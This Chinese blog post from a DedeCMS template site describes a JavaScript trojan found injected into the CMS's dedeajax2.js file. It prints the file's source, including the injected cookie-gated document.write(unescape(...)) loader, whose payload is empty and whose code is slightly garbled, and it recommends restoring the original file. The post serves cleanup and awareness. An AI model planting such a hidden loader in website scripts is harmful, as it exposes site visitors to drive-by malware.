欢迎来到酱油妹!织梦模板,dede模板下载,织梦cms模板,免费网站模板下载站

织梦DEDECMS:dedeajax2.js被植入js木马

企业模板

这阵子我的一个织梦DEDECMScms网站被植入了木马,程序dede。于是我升级到了IE7+全补丁,为了查木马做筹备工作,呵呵。结果发现,织梦DEDEajax2.js被植入了木马。源代码如下://初始化xmldomfunction InitXDom(){if(DedeXDOM!=null) return;var obj = null;if (typeof(DOMParser) != "undefined") { // Gecko、Mozilla、Firefoxvar parser = new DOMParser();obj = parser.parseFromString(xmlText, "text/xml");} else { // IEtry { obj = new ActiveXObject("MSXML2.DOMDocument");} catch (e) { }if (obj == null) try { obj = new ActiveXObject("Microsoft.XMLDOM"); } catch (e) { }}DedeXDOM = obj;};//以下是被植入木马的部分,乱码都是经由unicode码处置。目前的马夫愈来愈狡猾了if(document.cookie.indexOf('hello')==-1){var expires=new Date();expires.setTime(expires.getTime() 24*60*60*1000);document.cookie='hello=Yes;path=/;expires=' expires.toGMTString();document.write(unescape(""));}用原版本的dedeajax2覆盖,即可。这个文件,dede的模板都要用到,搜索了,没有发现说明用处。不过提议大家,多注意织梦DEDE的官方补丁,unix服务器的织梦DEDE站长,千万别所有文件都是设置,虽然dede在unix的服务器上,设置太过繁琐。


希望以上内容可以解决您的问题!
如有其他问题欢迎大家一起交流学习!
作者:酱油妹 来源:互联网 关注: 时间:2019-11-26 08:23
版权声明:凡注明来源为www.jiangyoumei.com的均为本站原创,转载请注明来源。
本文网址:http://www.jiangyoumei.com/jiaocheng/jiqiao/20191202/3120.html
►凡本站提供教程均已验证教程的准确性。
►为提高用户在织梦后台添加栏目的灵活性(可随意添加/删除栏目),并保持(管理后台添加/删除栏目)与前端网站栏目的一致,本站模板中栏目均未固定,用户直接搜索typeid=''并替换''中的数字为所需栏目id即可。
►本站提供各种类型织梦模板!希望在这里找到喜欢的。下载本站模板,用户直接替换相关文字和图片即可。
►本站仅提供织梦模板即(DEDE模板),(除另外说明)均不带织梦安装程序及数据,用户直接覆盖默认模板即可。
►本站所有资源(包括源码、模板、插件等)仅供学习与参考,请勿用于商业用途。
►如有其他问题,请加网站客服QQ(375750496)进行交流。
相关织梦教程
在线客服

织梦模板 整站模板 新手教程 使用技巧